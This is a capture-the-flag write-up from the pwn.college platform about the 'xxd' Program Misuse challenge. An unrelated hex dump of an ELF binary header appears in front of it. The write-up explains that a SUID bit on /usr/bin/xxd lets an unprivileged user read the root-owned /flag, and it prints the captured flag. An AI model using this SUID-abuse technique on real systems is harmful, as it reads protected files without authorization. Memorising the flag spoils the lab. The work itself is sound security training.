00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 03 00 3e 00 01 00 00 00 60 10 40 00 00 00 00 00 |..>.....`.@.....| 00000020 40 00 00 00 00 00 00 00 48 30 00 00 00 00 00 00 |@.......H0......| 00000030 00 00 00 00 40 00 38 00 09 00 40 00 1a 00 19 00 |....@.8...@.....| 00000040 06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 |........@.......| 00000050 40 00 40 00 00 00 00 00 40 00 40 00 00 00 00 00 |@.@.....@.@.....| 00000060 f8 01 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 |................| 00000070 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00 |................| 00000080 38 02 00 00 00 00 00 00 38 02 40 00 00 00 00 00 |8.......8.@.....| 00000090 38 02 40 00 00 00 00 00 1c 00 00 00 00 00 00 00 |8.@.............| 000000a0 1c 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................| 000000b0 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................| 000000c0 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..@.......@.....| 000000d0 e4 08 00 00 00 00 00 00 e4 08 00 00 00 00 00 00 |................| 000000e0 00 10 00 00 00 00 00 00 01 00 00 00 06 00 00 00 |................| 000000f0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....| 00000100 e8 0d 60 00 00 00 00 00 48 02 00 00 00 00 00 00 |..`.....H.......| 00000110 50 02 00 00 00 00 00 00 00 10 00 00 00 00 00 00 |P...............| 00000120 02 00 00 00 06 00 00 00 08 0e 00 00 00 00 00 00 |................| 00000130 08 0e 60 00 00 00 00 00 08 0e 60 00 00 00 00 00 |..`.......`.....| 00000140 f0 01 00 00 00 00 00 00 f0 01 00 00 00 00 00 00 |................| 00000150 08 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 |................| 00000160 54 02 00 00 00 00 00 00 54 02 40 00 00 00 00 00 |T.......T.@.....| 00000170 54 02 40 00 00 00 00 00 44 00 00 00 00 00 00 00 |T.@.....D.......| 00000180 44 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 |D...............| 00000190 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 |Q.td............| 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001c0 08 00 00 00 00 00 00 00 52 e5 74 64 04 00 00 00 |........R.td....| 000001d0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....|

0xKAAAMMUUI

Challenge Name: xxd

Writeup from Program Misuse

Category: Program Misuse
Platform: pwn.college
Difficulty: Begineer Date: 2025-07-15
Author: Himanshu Parate

🧠 Summary:

The challenge abuses a SUID bit set on /usr/bin/xxd, allowing an unprivileged user to read the root-owned flag file at /flag.

🔍 Enumeration

ls -l /usr/bin/xxd

output:

-rwsr-xr-x 1 root root 47480 Sep  5  2019 /usr/bin/xxd

-The s in -rws indicates it’s a SUID binary. -xxd runs with root privileges.

🚀 Exploitation

The xxd is a powerful Linux command used to:

1.Create hex dumps of files (like hd or hexdump)

2.Revert hex dumps back to binary

3.View both hex values and ASCII side-by-side

This can easily reveal the contents of /flag.

xxd /flag

Output:

00000000: 7077 6e2e 636f 6c6c 6567 657b 6b48 624a  pwn.college{kHbJ
00000010: 3871 7a52 786f 4d53 6546 7762 6e49 3567  8qzRxoMSeFwbnI5g
00000020: 4f45 574d 3743 6f2e 6456 544e 7877 534d  OEWM7Co.dVTNxwSM
00000030: 3049 7a4d 7945 7a57 7d0a                 0IzMyEzW}.